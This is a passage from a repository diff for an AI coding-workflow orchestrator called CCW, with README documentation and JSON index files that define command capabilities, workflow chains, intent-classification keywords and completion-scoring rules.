| CLI Analysis | `ccw cli --tool gemini` | Fast comprehension of large codebases, architecture assessment |
| CLI Implement | `ccw cli --tool codex` | Autonomous implementation of well-specified requirements |
| CLI Debug | `ccw cli --tool gemini` | Root-cause analysis of complex bugs, execution-flow tracing |
## Index Files (Dynamic Coordination)

CCW uses index files for intelligent command coordination:

| Index | Purpose |
|-------|---------|
| [index/command-capabilities.json](index/command-capabilities.json) | Command capability categories: explore, plan, execute, test, review... |
| [index/workflow-chains.json](index/workflow-chains.json) | Predefined workflow chains: rapid, full, coupled, bugfix, issue, tdd, ui... |

### Capability Categories
```
capabilities:
├── explore - code exploration, context gathering
├── brainstorm - multi-role analysis, solution exploration
├── plan - task planning, decomposition
├── verify - plan verification, quality checks
├── execute - task execution, code implementation
├── bugfix - bug diagnosis, fixing
├── test - test generation, execution
├── review - code review, quality analysis
├── issue - batch issue management
├── ui-design - UI design, prototyping
├── memory - documentation, knowledge management
├── session - session management
└── debug - debugging, troubleshooting
```
## TODO Tracking Integration

CCW automatically tracks workflow progress with TodoWrite:

```javascript
// A TODO list is created automatically when a workflow starts
TodoWrite({
  todos: [
    { content: "CCW: Rapid Iteration (2 steps)", status: "in_progress", activeForm: "Running workflow" },
    { content: "[1/2] /workflow:lite-plan", status: "in_progress", activeForm: "Executing lite-plan" },
    { content: "[2/2] /workflow:lite-execute", status: "pending", activeForm: "Executing lite-execute" }
  ]
})
// Status is updated automatically after each step
// Supports pause, continue, and skip
```

**Progress visualization**:
```
✓ CCW: Rapid Iteration (2 steps)
  ✓ [1/2] /workflow:lite-plan
  → [2/2] /workflow:lite-execute
```
**Control commands**:

| Command | Action |
|---------|--------|
| `continue` | Run the next step |
| `skip` | Skip the current step |
| `abort` | Abort the workflow |
| `/workflow:*` | Switch to the specified command |
| Natural language | Re-analyze the intent |
## Reference Documents

| Document | Purpose |
|----------|---------|
| [phases/orchestrator.md](phases/orchestrator.md) | Orchestrator decision logic + TODO tracking |
| [phases/actions/rapid.md](phases/actions/rapid.md) | Rapid iteration combination |
| [phases/actions/full.md](phases/actions/full.md) | Full-process combination |
| [phases/actions/coupled.md](phases/actions/coupled.md) | Coupled-planning combination |
| [phases/actions/bugfix.md](phases/actions/bugfix.md) | Bugfix combination |
| [phases/actions/issue.md](phases/actions/issue.md) | Issue workflow combination |
| [specs/intent-classification.md](specs/intent-classification.md) | Intent classification spec |
| [WORKFLOW_DECISION_GUIDE.md](/WORKFLOW_DECISION_GUIDE.md) | Workflow decision guide |
## Workflow Flow Details

### Issue Workflow (Two-Phase Lifecycle)

The issue workflow is a two-phase lifecycle: accumulate issues during project iteration, then resolve them in a focused batch.

**Phase 1: Accumulation**
- Triggers: post-task review, code-review findings, test failures
- Activities: requirement expansion, bug analysis, test coverage, security review
- Commands: `/issue:discover`, `/issue:discover-by-prompt`, `/issue:new`

**Phase 2: Batch Resolution**
- Trigger: enough issues accumulated for centralized processing
- Flow: plan → queue → execute
- Commands: `/issue:plan --all-pending` → `/issue:queue` → `/issue:execute`

```
task done → discover → accumulate issues → ... → plan all → queue → parallel execute
   ↑                                                                    ↓
   └──────────────────────────── iteration loop ────────────────────────┘
```

### lite-lite-lite vs multi-cli-plan

| Dimension | lite-lite-lite | multi-cli-plan |
|-----------|----------------|----------------|
| **Artifacts** | None | IMPL_PLAN.md + plan.json + synthesis.json |
| **State** | Stateless | Persistent session |
| **CLI selection** | Auto-selected from task analysis | Config-driven |
| **Iteration** | Via AskUser | Multiple rounds until convergence |
| **Execution** | Direct | Via lite-execute |
| **Best for** | Quick fixes, simple features | Complex multi-step implementations |

**Selection guide**:
- Task is clear and the change surface is small → `lite-lite-lite`
- Needs multi-perspective analysis or complex architecture → `multi-cli-plan`

### multi-cli-plan vs lite-plan

| Dimension | multi-cli-plan | lite-plan |
|-----------|----------------|-----------|
| **Context** | ACE semantic search | Manual file patterns |
| **Analysis** | Multi-CLI cross-verification | Single-pass planning |
| **Iteration** | Multiple rounds until convergence | Single round |
| **Confidence** | High (consensus-driven) | Medium (single perspective) |
| **Best for** | Complex tasks needing multiple perspectives | Straightforward implementations |

**Selection guide**:
- Clear requirements, clear path → `lite-plan`
- Needs trade-off analysis or comparing alternatives → `multi-cli-plan`

## Artifact Flow Protocol

Automatic hand-off of workflow artifacts, with intent extraction and completion scoring across the different output formats.

### Output Formats

| Command | Output Location | Format | Key Fields |
|---------|-----------------|--------|------------|
| `/workflow:lite-plan` | memory://plan | structured_plan | tasks, files, dependencies |
| `/workflow:plan` | .workflow/{session}/IMPL_PLAN.md | markdown_plan | phases, tasks, risks |
| `/workflow:execute` | execution_log.json | execution_report | completed_tasks, errors |
| `/workflow:test-cycle-execute` | test_results.json | test_report | pass_rate, failures, coverage |
| `/workflow:review-session-cycle` | review_report.md | review_report | findings, severity_counts |

### Intent Extraction

When flowing to the next step, key information is extracted automatically:

```
plan → execute:
  extract: tasks (incomplete), priority_order, files_to_modify, context_summary
execute → test:
  extract: modified_files, test_scope (inferred), pending_verification
test → fix:
  condition: pass_rate < 0.95
  extract: failures, error_messages, affected_files, suggested_fixes
review → fix:
  condition: critical > 0 OR high > 3
  extract: findings (critical/high), fix_priority, affected_files
```

### Completion Scoring

**Test completion routing**:
```
pass_rate >= 0.95 AND coverage >= 0.80 → complete
pass_rate >= 0.95 AND coverage < 0.80 → add_more_tests
pass_rate >= 0.80 → fix_failures_then_continue
pass_rate < 0.80 → major_fix_required
```

**Review completion routing**:
```
critical == 0 AND high <= 3 → complete_or_optional_fix
critical > 0 → mandatory_fix
high > 3 → recommended_fix
```

### Flow Decision Patterns

**plan_execute_test**:
```
plan → execute → test
         ↓ (if test fail)
extract_failures → fix → test (max 3 iterations)
         ↓ (if still fail)
manual_intervention
```

**iterative_improvement**:
```
execute → test → fix → test → ...
loop until: pass_rate >= 0.95 OR iterations >= 3
```

### Usage Example

```javascript
// After execution completes, decide the next step from the artifacts
const result = await execute(plan)

// Extract intent and flow into testing
const testContext = extractIntent('execute_to_test', result)
// testContext = { modified_files, test_scope, pending_verification }

// After tests, route on the completion score
const testResult = await test(testContext)
const nextStep = evaluateCompletion('test', testResult)
// nextStep = 'fix_failures_then_continue' if pass_rate = 0.85
```

## Examples

### Example 1: Bug Fix
```
User: 用户登录失败,返回 401 错误
CCW: Intent=bugfix, Workflow=lite-fix
  → /workflow:lite-fix "用户登录失败,返回 401 错误"
```

### Example 2: New Feature (Simple)
```
User: 添加用户头像上传功能
CCW: Intent=feature, Complexity=low, Workflow=lite-plan→lite-execute
  → /workflow:lite-plan "添加用户头像上传功能"
```

### Example 3: Complex Refactoring
```
User: 重构整个认证模块,迁移到 OAuth2
CCW: Intent=feature, Complexity=high, Workflow=plan→verify→execute
  → /workflow:plan "重构整个认证模块,迁移到 OAuth2"
```

### Example 4: Exploration
```
User: 我想优化系统性能,但不知道从哪入手
CCW: Intent=exploration, Workflow=brainstorm→plan→execute
  → /workflow:brainstorm:auto-parallel "探索系统性能优化方向"
```

### Example 5: Multi-Model Collaboration
```
User: 用 gemini 分析现有架构,然后让 codex 实现优化
CCW: Detects tool preferences, executes in sequence
  → Gemini CLI (analysis) → Codex CLI (implementation)
```
## Reference
- [command.json](command.json) - Command metadata, flow definitions, intent rules, artifact flow


@@ -0,0 +1,547 @@
{
"_metadata": {
"version": "2.0.0",
"description": "Unified CCW command index with capabilities, flows, and intent rules"
},
"capabilities": {
"explore": {
"description": "Codebase exploration and context gathering",
"commands": ["/workflow:init", "/workflow:tools:gather", "/memory:load"],
"agents": ["cli-explore-agent", "context-search-agent"]
},
"brainstorm": {
"description": "Multi-perspective analysis and ideation",
"commands": ["/workflow:brainstorm:auto-parallel", "/workflow:brainstorm:artifacts", "/workflow:brainstorm:synthesis"],
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
},
"plan": {
"description": "Task planning and decomposition",
"commands": ["/workflow:lite-plan", "/workflow:plan", "/workflow:tdd-plan", "/task:create", "/task:breakdown"],
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
},
"verify": {
"description": "Plan and quality verification",
"commands": ["/workflow:action-plan-verify", "/workflow:tdd-verify"]
},
"execute": {
"description": "Task execution and implementation",
"commands": ["/workflow:lite-execute", "/workflow:execute", "/task:execute"],
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
},
"bugfix": {
"description": "Bug diagnosis and fixing",
"commands": ["/workflow:lite-fix"],
"agents": ["code-developer"]
},
"test": {
"description": "Test generation and execution",
"commands": ["/workflow:test-gen", "/workflow:test-fix-gen", "/workflow:test-cycle-execute"],
"agents": ["test-fix-agent"]
},
"review": {
"description": "Code review and quality analysis",
"commands": ["/workflow:review-session-cycle", "/workflow:review-module-cycle", "/workflow:review", "/workflow:review-fix"]
},
"issue": {
"description": "Issue lifecycle management - discover, accumulate, batch resolve",
"commands": ["/issue:new", "/issue:discover", "/issue:discover-by-prompt", "/issue:plan", "/issue:queue", "/issue:execute", "/issue:manage"],
"agents": ["issue-plan-agent", "issue-queue-agent", "cli-explore-agent"],
"lifecycle": {
"accumulation": {
"description": "任务完成后进行需求扩展、bug分析、测试发现",
"triggers": ["post-task review", "code review findings", "test failures"],
"commands": ["/issue:discover", "/issue:discover-by-prompt", "/issue:new"]
},
"batch_resolution": {
"description": "积累的issue集中规划和并行执行",
"flow": ["plan", "queue", "execute"],
"commands": ["/issue:plan --all-pending", "/issue:queue", "/issue:execute"]
}
}
},
"ui-design": {
"description": "UI design and prototyping",
"commands": ["/workflow:ui-design:explore-auto", "/workflow:ui-design:imitate-auto", "/workflow:ui-design:design-sync"],
"agents": ["ui-design-agent"]
},
"memory": {
"description": "Documentation and knowledge management",
"commands": ["/memory:docs", "/memory:update-related", "/memory:update-full", "/memory:skill-memory"],
"agents": ["doc-generator", "memory-bridge"]
}
},
"flows": {
"rapid": {
"name": "Rapid Iteration",
"description": "多模型协作分析 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{ "command": "/workflow:lite-plan", "optional": false, "auto_continue": true },
{ "command": "/workflow:lite-execute", "optional": false }
],
"cli_hints": {
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
"execution": { "tool": "codex", "mode": "write", "trigger": "complexity >= medium" }
},
"estimated_time": "15-45 min"
},
"full": {
"name": "Full Exploration",
"description": "头脑风暴 + 规划 + 执行",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:brainstorm:auto-parallel", "optional": false, "confirm_before": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
{ "command": "/workflow:execute", "optional": false }
],
"cli_hints": {
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
},
"estimated_time": "1-3 hours"
},
"coupled": {
"name": "Coupled Planning",
"description": "完整规划 + 验证 + 执行",
"complexity": ["high"],
"steps": [
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
{ "command": "/workflow:execute", "optional": false },
{ "command": "/workflow:review", "optional": true }
],
"cli_hints": {
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"execution": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "2-4 hours"
},
"bugfix": {
"name": "Bug Fix",
"description": "智能诊断 + 修复",
"complexity": ["low", "medium"],
"variants": {
"standard": [{ "command": "/workflow:lite-fix", "optional": false }],
"hotfix": [{ "command": "/workflow:lite-fix --hotfix", "optional": false }]
},
"cli_hints": {
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
},
"estimated_time": "10-30 min"
},
"issue": {
"name": "Issue Lifecycle",
"description": "发现积累 → 批量规划 → 队列优化 → 并行执行",
"complexity": ["medium", "high"],
"phases": {
"accumulation": {
"description": "项目迭代中持续发现和积累issue",
"commands": ["/issue:discover", "/issue:new"],
"trigger": "post-task, code-review, test-failure"
},
"resolution": {
"description": "集中规划和执行积累的issue",
"steps": [
{ "command": "/issue:plan --all-pending", "optional": false },
{ "command": "/issue:queue", "optional": false },
{ "command": "/issue:execute", "optional": false }
]
}
},
"cli_hints": {
"discovery": { "tool": "gemini", "mode": "analysis", "trigger": "perspective_analysis", "parallel": true },
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "1-4 hours"
},
"lite-lite-lite": {
"name": "Ultra-Lite Multi-CLI",
"description": "零文件 + 自动CLI选择 + 语义描述 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{ "phase": "clarify", "description": "需求澄清 (AskUser if needed)" },
{ "phase": "auto-select", "description": "任务分析 → 自动选择CLI组合" },
{ "phase": "multi-cli", "description": "并行多CLI分析" },
{ "phase": "decision", "description": "展示结果 → AskUser决策" },
{ "phase": "execute", "description": "直接执行 (无中间文件)" }
],
"vs_multi_cli_plan": {
"artifacts": "None vs IMPL_PLAN.md + plan.json + synthesis.json",
"session": "Stateless vs Persistent",
"cli_selection": "Auto-select based on task analysis vs Config-driven",
"iteration": "Via AskUser vs Via rounds/synthesis",
"execution": "Direct vs Via lite-execute",
"best_for": "Quick fixes, simple features vs Complex multi-step implementations"
},
"cli_hints": {
"analysis": { "tool": "auto", "mode": "analysis", "parallel": true },
"execution": { "tool": "auto", "mode": "write" }
},
"estimated_time": "10-30 min"
},
"multi-cli-plan": {
"name": "Multi-CLI Collaborative Planning",
"description": "ACE上下文 + 多CLI协作分析 + 迭代收敛 + 计划生成",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:multi-cli-plan", "optional": false, "phases": [
"context_gathering: ACE语义搜索",
"multi_cli_discussion: cli-discuss-agent多轮分析",
"present_options: 展示解决方案",
"user_decision: 用户选择",
"plan_generation: cli-lite-planning-agent生成计划"
]},
{ "command": "/workflow:lite-execute", "optional": false }
],
"vs_lite_plan": {
"context": "ACE semantic search vs Manual file patterns",
"analysis": "Multi-CLI cross-verification vs Single-pass planning",
"iteration": "Multiple rounds until convergence vs Single round",
"confidence": "High (consensus-based) vs Medium (single perspective)",
"best_for": "Complex tasks needing multiple perspectives vs Straightforward implementations"
},
"agents": ["cli-discuss-agent", "cli-lite-planning-agent"],
"cli_hints": {
"discussion": { "tools": ["gemini", "codex", "claude"], "mode": "analysis", "parallel": true },
"planning": { "tool": "gemini", "mode": "analysis" }
},
"output": ".workflow/.multi-cli-plan/{session-id}/",
"estimated_time": "30-90 min"
},
"tdd": {
"name": "Test-Driven Development",
"description": "TDD规划 + 执行 + 验证",
"complexity": ["medium", "high"],
"steps": [
{ "command": "/workflow:tdd-plan", "optional": false },
{ "command": "/workflow:execute", "optional": false },
{ "command": "/workflow:tdd-verify", "optional": false }
],
"cli_hints": {
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
},
"estimated_time": "1-3 hours"
},
"ui": {
"name": "UI-First Development",
"description": "UI设计 + 规划 + 执行",
"complexity": ["medium", "high"],
"variants": {
"explore": [
{ "command": "/workflow:ui-design:explore-auto", "optional": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:execute", "optional": false }
],
"imitate": [
{ "command": "/workflow:ui-design:imitate-auto", "optional": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false },
{ "command": "/workflow:execute", "optional": false }
]
},
"estimated_time": "2-4 hours"
},
"review-fix": {
"name": "Review and Fix",
"description": "多维审查 + 自动修复",
"complexity": ["medium"],
"steps": [
{ "command": "/workflow:review-session-cycle", "optional": false },
{ "command": "/workflow:review-fix", "optional": true }
],
"cli_hints": {
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true },
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
},
"estimated_time": "30-90 min"
},
"docs": {
"name": "Documentation",
"description": "批量文档生成",
"complexity": ["low", "medium"],
"variants": {
"incremental": [{ "command": "/memory:update-related", "optional": false }],
"full": [
{ "command": "/memory:docs", "optional": false },
{ "command": "/workflow:execute", "optional": false }
]
},
"estimated_time": "15-60 min"
}
},
"intent_rules": {
"bugfix": {
"priority": 1,
"variants": {
"hotfix": {
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
"flow": "bugfix.hotfix"
},
"standard": {
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "修复", "错误", "崩溃"],
"flow": "bugfix.standard"
}
}
},
"issue_batch": {
"priority": 2,
"patterns": {
"batch": ["issues", "batch", "queue", "多个", "批量"],
"action": ["fix", "resolve", "处理", "解决"]
},
"require_both": true,
"flow": "issue"
},
"exploration": {
"priority": 3,
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "探索"],
"flow": "full"
},
"ui_design": {
"priority": 4,
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局"],
"variants": {
"imitate": { "triggers": ["参考", "模仿", "像", "类似"], "flow": "ui.imitate" },
"explore": { "triggers": [], "flow": "ui.explore" }
}
},
"tdd": {
"priority": 5,
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "test first"],
"flow": "tdd"
},
"review": {
"priority": 6,
"patterns": ["review", "审查", "检查代码", "code review", "质量检查"],
"flow": "review-fix"
},
"documentation": {
"priority": 7,
"patterns": ["文档", "documentation", "docs", "readme"],
"variants": {
"incremental": { "triggers": ["更新", "增量"], "flow": "docs.incremental" },
"full": { "triggers": ["全部", "完整"], "flow": "docs.full" }
}
},
"feature": {
"priority": 99,
"complexity_map": {
"high": "coupled",
"medium": "rapid",
"low": "rapid"
}
}
},
"complexity_indicators": {
"high": {
"threshold": 4,
"patterns": {
"architecture": { "keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"], "weight": 2 },
"multi_module": { "keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"], "weight": 2 },
"integration": { "keywords": ["integrate", "集成", "api", "database", "数据库"], "weight": 1 },
"quality": { "keywords": ["security", "安全", "performance", "性能", "scale", "扩展"], "weight": 1 }
}
},
"medium": { "threshold": 2 },
"low": { "threshold": 0 }
},
"cli_tools": {
"gemini": {
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
"triggers": ["分析", "理解", "设计", "架构", "诊断"],
"mode": "analysis"
},
"qwen": {
"strengths": ["代码模式识别", "多维度分析"],
"triggers": ["评估", "对比", "验证"],
"mode": "analysis"
},
"codex": {
"strengths": ["精确代码生成", "自主执行"],
"triggers": ["实现", "重构", "修复", "生成"],
"mode": "write"
}
},
"cli_injection_rules": {
"context_gathering": { "trigger": "file_read >= 50k OR module_count >= 5", "inject": "gemini --mode analysis" },
"pre_planning_analysis": { "trigger": "complexity === high", "inject": "gemini --mode analysis" },
"debug_diagnosis": { "trigger": "intent === bugfix AND root_cause_unclear", "inject": "gemini --mode analysis" },
"code_review": { "trigger": "step === review", "inject": "gemini --mode analysis" },
"implementation": { "trigger": "step === execute AND task_count >= 3", "inject": "codex --mode write" }
},
"artifact_flow": {
"_description": "定义工作流产出的格式、意图提取和流转规则",
"outputs": {
"/workflow:lite-plan": {
"artifact": "memory://plan",
"format": "structured_plan",
"fields": ["tasks", "files", "dependencies", "approach"]
},
"/workflow:plan": {
"artifact": ".workflow/{session}/IMPL_PLAN.md",
"format": "markdown_plan",
"fields": ["phases", "tasks", "dependencies", "risks", "test_strategy"]
},
"/workflow:multi-cli-plan": {
"artifact": ".workflow/.multi-cli-plan/{session}/",
"format": "multi_file",
"files": ["IMPL_PLAN.md", "plan.json", "synthesis.json"],
"fields": ["consensus", "divergences", "recommended_approach", "tasks"]
},
"/workflow:lite-execute": {
"artifact": "git_changes",
"format": "code_diff",
"fields": ["modified_files", "added_files", "deleted_files", "build_status"]
},
"/workflow:execute": {
"artifact": ".workflow/{session}/execution_log.json",
"format": "execution_report",
"fields": ["completed_tasks", "pending_tasks", "errors", "warnings"]
},
"/workflow:test-cycle-execute": {
"artifact": ".workflow/{session}/test_results.json",
"format": "test_report",
"fields": ["pass_rate", "failures", "coverage", "duration"]
},
"/workflow:review-session-cycle": {
"artifact": ".workflow/{session}/review_report.md",
"format": "review_report",
"fields": ["findings", "severity_counts", "recommendations"]
},
"/workflow:lite-fix": {
"artifact": "git_changes",
"format": "fix_report",
"fields": ["root_cause", "fix_applied", "files_modified", "verification_status"]
}
},
"intent_extraction": {
"plan_to_execute": {
"from": ["lite-plan", "plan", "multi-cli-plan"],
"to": ["lite-execute", "execute"],
"extract": {
"tasks": "$.tasks[] | filter(status != 'completed')",
"priority_order": "$.tasks | sort_by(priority)",
"files_to_modify": "$.tasks[].files | flatten | unique",
"dependencies": "$.dependencies",
"context_summary": "$.approach OR $.recommended_approach"
}
},
"execute_to_test": {
"from": ["lite-execute", "execute"],
"to": ["test-cycle-execute", "test-fix-gen"],
"extract": {
"modified_files": "$.modified_files",
"test_scope": "infer_from($.modified_files)",
"build_status": "$.build_status",
"pending_verification": "$.completed_tasks | needs_test"
}
},
"test_to_fix": {
"from": ["test-cycle-execute"],
"to": ["lite-fix", "review-fix"],
"condition": "$.pass_rate < 0.95",
"extract": {
"failures": "$.failures",
"error_messages": "$.failures[].message",
"affected_files": "$.failures[].file",
"suggested_fixes": "$.failures[].suggested_fix"
}
},
"review_to_fix": {
"from": ["review-session-cycle", "review-module-cycle"],
"to": ["review-fix"],
"condition": "$.severity_counts.critical > 0 OR $.severity_counts.high > 3",
"extract": {
"findings": "$.findings | filter(severity in ['critical', 'high'])",
"fix_priority": "$.findings | group_by(category) | sort_by(severity)",
"affected_files": "$.findings[].file | unique"
}
}
},
"completion_criteria": {
"plan": {
"required": ["has_tasks", "has_files"],
"optional": ["has_tests", "no_blocking_risks"],
"threshold": 0.8,
"routing": {
"complete": "proceed_to_execute",
"incomplete": "clarify_requirements"
}
},
"execute": {
"required": ["all_tasks_attempted", "no_critical_errors"],
"optional": ["build_passes", "lint_passes"],
"threshold": 1.0,
"routing": {
"complete": "proceed_to_test_or_review",
"partial": "continue_execution",
"failed": "diagnose_and_retry"
}
},
"test": {
"metrics": {
"pass_rate": { "target": 0.95, "minimum": 0.80 },
"coverage": { "target": 0.80, "minimum": 0.60 }
},
"routing": {
"pass_rate >= 0.95 AND coverage >= 0.80": "complete",
"pass_rate >= 0.95 AND coverage < 0.80": "add_more_tests",
"pass_rate >= 0.80": "fix_failures_then_continue",
"pass_rate < 0.80": "major_fix_required"
}
},
"review": {
"metrics": {
"critical_findings": { "target": 0, "maximum": 0 },
"high_findings": { "target": 0, "maximum": 3 }
},
"routing": {
"critical == 0 AND high <= 3": "complete_or_optional_fix",
"critical > 0": "mandatory_fix",
"high > 3": "recommended_fix"
}
}
},
"flow_decisions": {
"_description": "根据产出完成度决定下一步",
"patterns": {
"plan_execute_test": {
"sequence": ["plan", "execute", "test"],
"on_test_fail": {
"action": "extract_failures_and_fix",
"max_iterations": 3,
"fallback": "manual_intervention"
}
},
"plan_execute_review": {
"sequence": ["plan", "execute", "review"],
"on_review_issues": {
"action": "prioritize_and_fix",
"auto_fix_threshold": "severity < high"
}
},
"iterative_improvement": {
"sequence": ["execute", "test", "fix"],
"loop_until": "pass_rate >= 0.95 OR iterations >= 3",
"on_loop_exit": "report_status"
}
}
}
}
}


@@ -1,127 +0,0 @@
{
"_metadata": {
"version": "1.0.0",
"generated": "2026-01-03",
"description": "CCW command capability index for intelligent workflow coordination"
},
"capabilities": {
"explore": {
"description": "Codebase exploration and context gathering",
"commands": [
{ "command": "/workflow:init", "weight": 1.0, "tags": ["project-setup", "context"] },
{ "command": "/workflow:tools:gather", "weight": 0.9, "tags": ["context", "analysis"] },
{ "command": "/memory:load", "weight": 0.8, "tags": ["context", "memory"] }
],
"agents": ["cli-explore-agent", "context-search-agent"]
},
"brainstorm": {
"description": "Multi-perspective analysis and ideation",
"commands": [
{ "command": "/workflow:brainstorm:auto-parallel", "weight": 1.0, "tags": ["exploration", "multi-role"] },
{ "command": "/workflow:brainstorm:artifacts", "weight": 0.9, "tags": ["clarification", "guidance"] },
{ "command": "/workflow:brainstorm:synthesis", "weight": 0.8, "tags": ["consolidation", "refinement"] }
],
"roles": ["product-manager", "system-architect", "ux-expert", "data-architect", "api-designer"]
},
"plan": {
"description": "Task planning and decomposition",
"commands": [
{ "command": "/workflow:lite-plan", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "interactive"] },
{ "command": "/workflow:plan", "weight": 0.9, "complexity": "medium-high", "tags": ["comprehensive", "persistent"] },
{ "command": "/workflow:tdd-plan", "weight": 0.7, "complexity": "medium-high", "tags": ["test-first", "quality"] },
{ "command": "/task:create", "weight": 0.6, "tags": ["single-task", "manual"] },
{ "command": "/task:breakdown", "weight": 0.5, "tags": ["decomposition", "subtasks"] }
],
"agents": ["cli-lite-planning-agent", "action-planning-agent"]
},
"verify": {
"description": "Plan and quality verification",
"commands": [
{ "command": "/workflow:action-plan-verify", "weight": 1.0, "tags": ["plan-quality", "consistency"] },
{ "command": "/workflow:tdd-verify", "weight": 0.8, "tags": ["tdd-compliance", "coverage"] }
]
},
"execute": {
"description": "Task execution and implementation",
"commands": [
{ "command": "/workflow:lite-execute", "weight": 1.0, "complexity": "low-medium", "tags": ["fast", "agent-or-cli"] },
{ "command": "/workflow:execute", "weight": 0.9, "complexity": "medium-high", "tags": ["dag-parallel", "comprehensive"] },
{ "command": "/task:execute", "weight": 0.7, "tags": ["single-task"] }
],
"agents": ["code-developer", "cli-execution-agent", "universal-executor"]
},
"bugfix": {
"description": "Bug diagnosis and fixing",
"commands": [
{ "command": "/workflow:lite-fix", "weight": 1.0, "tags": ["diagnosis", "fix", "standard"] },
{ "command": "/workflow:lite-fix --hotfix", "weight": 0.9, "tags": ["emergency", "production", "fast"] }
],
"agents": ["code-developer"]
},
"test": {
"description": "Test generation and execution",
"commands": [
{ "command": "/workflow:test-gen", "weight": 1.0, "tags": ["post-implementation", "coverage"] },
{ "command": "/workflow:test-fix-gen", "weight": 0.9, "tags": ["from-description", "flexible"] },
{ "command": "/workflow:test-cycle-execute", "weight": 0.8, "tags": ["iterative", "fix-cycle"] }
],
"agents": ["test-fix-agent"]
},
"review": {
"description": "Code review and quality analysis",
"commands": [
{ "command": "/workflow:review-session-cycle", "weight": 1.0, "tags": ["session-based", "comprehensive"] },
{ "command": "/workflow:review-module-cycle", "weight": 0.9, "tags": ["module-based", "targeted"] },
{ "command": "/workflow:review", "weight": 0.8, "tags": ["single-pass", "type-specific"] },
{ "command": "/workflow:review-fix", "weight": 0.7, "tags": ["auto-fix", "findings"] }
]
},
"issue": {
"description": "Batch issue management",
"commands": [
{ "command": "/issue:new", "weight": 1.0, "tags": ["create", "import"] },
{ "command": "/issue:discover", "weight": 0.9, "tags": ["find", "analyze"] },
{ "command": "/issue:plan", "weight": 0.8, "tags": ["solutions", "planning"] },
{ "command": "/issue:queue", "weight": 0.7, "tags": ["prioritize", "order"] },
{ "command": "/issue:execute", "weight": 0.6, "tags": ["batch-execute", "dag"] }
],
"agents": ["issue-plan-agent", "issue-queue-agent"]
},
"ui-design": {
"description": "UI design and prototyping",
"commands": [
{ "command": "/workflow:ui-design:explore-auto", "weight": 1.0, "tags": ["from-scratch", "variants"] },
{ "command": "/workflow:ui-design:imitate-auto", "weight": 0.9, "tags": ["reference-based", "copy"] },
{ "command": "/workflow:ui-design:design-sync", "weight": 0.7, "tags": ["sync", "finalize"] },
{ "command": "/workflow:ui-design:generate", "weight": 0.6, "tags": ["assemble", "prototype"] }
],
"agents": ["ui-design-agent"]
},
"memory": {
"description": "Documentation and knowledge management",
"commands": [
{ "command": "/memory:docs", "weight": 1.0, "tags": ["generate", "planning"] },
{ "command": "/memory:update-related", "weight": 0.9, "tags": ["incremental", "git-based"] },
{ "command": "/memory:update-full", "weight": 0.8, "tags": ["comprehensive", "all-modules"] },
{ "command": "/memory:skill-memory", "weight": 0.7, "tags": ["package", "reusable"] }
],
"agents": ["doc-generator", "memory-bridge"]
},
"session": {
"description": "Workflow session management",
"commands": [
{ "command": "/workflow:session:start", "weight": 1.0, "tags": ["init", "discover"] },
{ "command": "/workflow:session:list", "weight": 0.9, "tags": ["view", "status"] },
{ "command": "/workflow:session:resume", "weight": 0.8, "tags": ["continue", "restore"] },
{ "command": "/workflow:session:complete", "weight": 0.7, "tags": ["finish", "archive"] }
]
},
"debug": {
"description": "Debugging and problem solving",
"commands": [
{ "command": "/workflow:debug", "weight": 1.0, "tags": ["hypothesis", "iterative"] },
{ "command": "/workflow:clean", "weight": 0.6, "tags": ["cleanup", "artifacts"] }
]
}
}
}


@@ -1,136 +0,0 @@
{
"_metadata": {
"version": "1.0.0",
"description": "Externalized intent classification rules for CCW orchestrator"
},
"intent_patterns": {
"bugfix": {
"priority": 1,
"description": "Bug修复意图",
"variants": {
"hotfix": {
"patterns": ["hotfix", "urgent", "production", "critical", "emergency", "紧急", "生产环境", "线上"],
"workflow": "lite-fix --hotfix"
},
"standard": {
"patterns": ["fix", "bug", "error", "issue", "crash", "broken", "fail", "wrong", "incorrect", "修复", "错误", "崩溃", "失败"],
"workflow": "lite-fix"
}
}
},
"issue_batch": {
"priority": 2,
"description": "批量Issue处理意图",
"patterns": {
"batch_keywords": ["issues", "issue", "batch", "queue", "多个", "批量", "一批"],
"action_keywords": ["fix", "resolve", "处理", "解决", "修复"]
},
